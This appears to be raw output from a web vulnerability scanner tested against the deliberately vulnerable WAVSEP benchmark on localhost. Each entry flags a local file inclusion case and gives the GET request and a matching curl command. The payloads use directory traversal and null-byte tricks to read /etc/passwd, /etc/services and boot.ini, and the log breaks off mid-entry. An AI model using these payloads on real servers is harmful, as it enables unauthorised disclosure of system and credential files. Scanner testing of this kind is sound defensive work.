Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
